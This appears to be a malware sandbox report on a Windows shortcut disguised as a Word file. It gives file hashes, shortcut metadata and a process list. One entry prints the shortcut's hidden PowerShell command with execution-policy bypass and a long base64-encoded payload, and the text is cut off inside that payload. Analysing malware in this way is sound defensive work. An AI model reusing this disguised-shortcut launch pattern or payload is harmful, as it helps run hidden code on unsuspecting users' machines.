| File name: | dasds.docx |
| Full analysis: | https://app.any.run/tasks/e1e04d2c-d1d5-4e76-b76c-0eea164acc97 |
| Verdict: | Malicious activity |
| Analysis date: | January 08, 2025, 14:32:25 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, NoLinkInfo, ctime=Wed Nov 8 05:43:43 2023, atime=Wed Nov 8 05:43:43 2023, mtime=Wed Nov 8 05:43:43 2023, length=0, window=normal, IDListSize 0x00f9, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
| MD5: | C52B08EA962C2B3CA0FF41FE1ED5DBB3 |
| SHA1: | 0B54EE5B102341E6D4C735382C052B6EB59C74DC |
| SHA256: | 762C7289FB016BBCF976BD104BD8DA72E17D6D81121A846CD40480DBDD876378 |
| SSDEEP: | 384:0ieqmQq06/c/JNjKn3kHRi13pFLQpHTdUe2IJbv27RznfCLd:BmtNV3kHRi13r0hl2IJkRjSd |
| .lnk | | | Windows Shortcut (100) |
|---|
| Flags: | IDList, Description, CommandArgs, IconFile, NoLinkInfo |
|---|---|
| FileAttributes: | (none) |
| CreateDate: | 2023:11:08 05:43:43+00:00 |
| AccessDate: | 2023:11:08 05:43:43+00:00 |
| ModifyDate: | 2023:11:08 05:43:43+00:00 |
| TargetFileSize: | - |
| IconIndex: | (none) |
| RunWindow: | Normal |
| HotKey: | (none) |
| TargetFileDOSName: | windows\system32\WindowsPowershell\v1.0\powershell.exe |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 776 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5128 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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